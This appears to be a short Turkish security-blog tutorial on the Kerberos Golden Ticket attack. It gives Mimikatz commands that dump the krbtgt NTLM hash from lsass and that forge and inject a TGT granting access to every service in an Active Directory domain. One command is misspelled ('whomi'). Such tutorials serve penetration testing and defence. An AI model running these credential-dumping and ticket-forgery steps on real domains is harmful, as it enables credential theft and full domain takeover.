Kerberos | Golden Ticket

Okunması gereken yazılar:

krbtgt, Key Distribution Center (KDC)’e ait servis hesabıdır. Bu hesap varsayılan olarak gelmektedir ve silinememektedir. krbtgt, TGT biletlerini vermekten sorumludur.

Saldırgan krbtgt hesabına ait NTLM hash’ini kullanarak TGT bileti oluşturup Active Directory üzerinde bulunan bütün servislere/makinelere erişim sağlayabilmektedir.

krbtgt hesabının NTLM hash’ini lsass process’inden, Domain Controller içerisindeki NTDS.dit dosyasından veya DCSync saldırısı ile öğrenilebilmektedir.

NTDS.dit dosyasından parola hash’lerinin nasıl elde edilebileceğini buradan inceleyebilirsiniz. Ayrıca DCSync tekniğine ait bilgilere buradan ulaşabilirsiniz.

Mimikatz ile krbtgt hesabına ait NTLM hash’ini elde etmek için:

mimikatz# privilege::debug
Mimikatz# lsadump::lsa /inject /name:krbtgt

Golden Ticket’ı oluşturabilmek için “Domain Name” ve “Domain SID” bilgileri gerekmektedir. Mimikatz üzerinden krbtgt hesabının NTLM hash’ini aldığımızda Mimikatz bu bilgileri bize vermekte, ayrıca komut satırı üzerinden bu bilgileri kolaylıkla öğrenebiliriz.

whomi /user

Gerekli bütün bilgileri elde ettiğimizde Mimikatz ile Golden Ticket’ı oluşturabiliriz.

mimikatz# kerberos::golden /user:evil /domain:pentest.local /sid:S-1-5-21-434157810-3574284310-2996746512-500 /krbtgt:0db846b4308214674bf6801ffc253efa /ticket:evil.tck /ptt

Saldırının gerçekleştiğini Mimikatz üzerinden doğrulayabiliriz.

mimikatz# kerberos::tgt

komutu ile anlık olarak kullanılan TGT ticket’ını öğrenebiliriz.

One Comment

Leave a Reply

Your email address will not be published.